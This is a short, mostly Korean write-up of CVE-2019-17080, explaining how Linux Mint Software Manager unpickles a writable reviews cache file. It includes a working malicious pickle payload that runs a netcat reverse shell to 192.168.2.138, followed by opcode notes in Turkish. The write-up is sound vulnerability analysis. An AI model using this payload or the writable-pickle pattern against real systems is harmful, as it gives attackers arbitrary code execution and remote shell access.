
CVE-2019-17080
Linux Mint 소프트웨어 관리자(v 7.9.5/9)는 잘못된 구성으로 인해 객체 인젝션과 임의 코드를 실행하게 합니다.
mintinsall
새 리뷰가 있으면 new-reviews.list 주소에서 다운로드하여 파일에 기록합니다.

code mintinstall.py
소프트웨어 관리자가 처음 시작되면 reviews 모듈에서 ReviewCache() 클래스를 호출합니다.

code reviews.py
ReviewCache 클래스가 시작되면(init) _load_cache() 함수를 호출합니다.

Load cache 함수는 REVIEWS_CACHE 변수의 파일을 읽고 pickle 모듈을 사용하여 파일의 데이터를 역직렬화하고 일부 값을 메모리에 보관합니다.

파일을 확인해 보면 쓰기 권한이 있는 것 같습니다.

Pickle 모듈로 직렬화/역직렬화 연산을 수행할 수 있으므로, reduce 메서드를 사용하여 모듈을 포함하고 임의 코드를 실행할 수 있습니다.

파일을 역직렬화하려고 하면 악성 코드가 실행됩니다.
cos
system
(S'nc -e /bin/sh 192.168.2.138 4545'
tR.
>>modül adı c{os}
>> fonksiyon
( >> işaretleyici nesnesi
S >> tırnak sonuna kadar okuyup stack'e at
tR. >> stackte olanları çagır ve sonucu stacke yerleştir.

